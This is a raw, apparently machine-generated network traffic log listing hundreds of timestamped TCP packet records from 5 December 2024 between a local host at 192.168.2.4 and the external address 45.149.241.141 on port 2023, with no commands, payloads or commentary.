                                                                                                                  Dec 5, 2024 10:47:13.871341944 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.873939991 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.874085903 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.874133110 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.876677036 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.876848936 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.876893997 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.879496098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.879558086 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.879605055 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.882180929 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.882302999 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.882347107 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.885056973 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.885174036 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.885215998 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.888250113 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.888344049 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.888403893 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.890489101 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.890618086 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.890664101 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.895420074 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.895437002 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.895478964 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.896122932 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.896269083 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.896321058 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.898709059 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.898777008 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.898827076 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.901463985 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.901490927 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.901537895 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.904273987 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.904514074 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.904567003 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.907036066 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.953521967 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.967468977 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.967540979 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.967582941 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.969067097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.969085932 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.969136953 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.971066952 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.972913027 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.972929955 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.972959042 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.974364042 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.974404097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.974405050 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.976753950 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.976799011 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.976823092 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.979034901 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.979100943 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.979111910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.981298923 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.981352091 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.981394053 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.983630896 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.983684063 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.983722925 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.985800982 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.985862970 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.985909939 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.988058090 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.988141060 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.988164902 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.990098953 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.990149021 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.990221024 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.992202044 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.992254972 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.992302895 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.994333029 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.994419098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.994420052 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.996463060 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.996525049 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.996536970 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.998456001 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.998518944 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.998527050 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.047292948 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.133444071 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.253882885 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.254013062 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.373933077 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.663840055 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.664169073 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.664186001 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.664295912 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.664793015 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.664849997 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.664896965 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.665426970 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.665477037 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.665476084 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.666342974 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.666440010 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.666496038 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.666896105 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.667002916 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.667047977 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.667901993 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.668178082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.668229103 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.668670893 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.668720961 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.668732882 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.669454098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.669504881 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.669642925 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.670351982 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.670387983 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.670454979 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.671308041 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.671359062 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.671407938 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.672189951 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.672276974 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.672305107 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.673158884 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.673207045 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.673295021 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.674422979 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.674434900 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.674464941 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.675121069 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.675163031 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.675221920 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.676019907 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.676060915 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.676089048 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.676940918 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.676989079 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.677031040 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.677879095 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.677922964 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.677985907 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.678867102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.678909063 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.678994894 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.679898977 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.679943085 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.680006981 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.680751085 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.680771112 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.680793047 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.681654930 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.681699038 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.681845903 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.682595015 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.682636023 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.682681084 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.683537960 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.683578968 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.683608055 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.684791088 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.684834003 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.684948921 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.685616016 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.685658932 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.685698986 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.686376095 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.686418056 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.686482906 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.687330008 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.687372923 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.687422991 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.688368082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.688409090 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.688414097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.689186096 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.689228058 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.689382076 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.690143108 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.690186977 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.690274954 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.691086054 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.691119909 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.691497087 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.691994905 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.692035913 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.692138910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.693000078 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.693041086 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.693063021 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.693881035 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.693928957 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.693924904 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.694864035 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.694905043 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.694998026 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.695806026 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.695849895 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.695899010 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.696728945 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.696774006 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.696887016 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.697678089 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.697717905 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.697721958 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.698631048 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.698683977 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.698702097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.699641943 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.699687958 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.699724913 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.700505972 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.700553894 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.700731039 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.701441050 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.701492071 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.701560974 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.702406883 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.702480078 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.702488899 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.703424931 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.703465939 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.703521013 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.704293013 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.704338074 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.704371929 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.705270052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.705312967 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.705404043 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.706170082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.706214905 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.706355095 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.707096100 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.707143068 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.707179070 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.708129883 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.708174944 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.708242893 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.708998919 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.709043026 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.709146976 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.709942102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.709980965 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.709990978 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.710870028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.710915089 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.711013079 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.711802006 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.711850882 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.711877108 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.712749958 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.712794065 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.712850094 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.713699102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.713741064 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.713767052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.714667082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.714713097 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.856189966 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.856206894 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.856359005 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.856538057 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.856602907 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.856777906 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.857496023 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.857774973 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.857821941 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.858431101 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.858747005 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.858789921 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.858952045 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.859760046 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.859879971 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.859927893 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.860622883 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.860673904 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.860755920 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.861557007 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.861599922 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.861650944 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.862524033 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.862566948 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.862637997 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.863471031 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.863514900 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.863588095 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.864402056 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.864453077 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.864654064 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.865382910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.865425110 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.865442038 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.866345882 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.866400003 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.866578102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.867242098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.867283106 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.867480040 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.868168116 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.868210077 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.868278980 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.869321108 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.869362116 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.869436026 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.870064974 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.870115995 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.870138884 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.870980978 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.871026039 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.871185064 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.871922970 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.871958017 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:14.871967077 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:14.872895956 CET20234977845.149.241.141192.168.2.4
